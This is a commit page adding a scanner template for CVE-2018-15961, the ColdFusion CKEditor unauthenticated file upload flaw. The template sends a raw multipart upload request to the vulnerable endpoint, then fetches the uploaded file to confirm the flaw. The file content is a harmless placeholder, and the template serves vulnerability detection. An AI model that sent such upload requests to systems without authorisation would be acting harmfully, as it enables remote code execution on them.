Creates CVE-2018-15961

Closes #3119 with minor updates to ensure the file isn't accessible predictably
2021-11-10 17:46:34 +00:00 · 2021-11-10 17:46:34 +00:00 · 7e10c6eb42
parent f6f32ae344
commit 7e10c6eb42
1 changed files with 40 additions and 0 deletions
--- a/cves/2018/CVE-2018-15961
+++ b/cves/2018/CVE-2018-15961
@ -0,0 +1,40 @@
+info:
+  name: CVE-2018-15961
+  author: SkyLark-Lab, ImNightmaree
+  severity: critical
+  tags: server,cve,cve2018,rce,coldfusion,fileupload
+  
+requests:  
+  - raw:
+     - |
+        POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------24464570528145
+
+        -----------------------------24464570528145
+        Content-Disposition: form-data; name="file"; filename="{{randstr}}"
+        Content-Type: image/jpeg
+
+        %%%%%%%%
+        -----------------------------24464570528145
+        Content-Disposition: form-data; name="path"
+
+        {{randstr}}
+        -----------------------------24464570528145--
+
+
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "{{randstr}}"
+          
+      - type: status
+        status:
+          - 200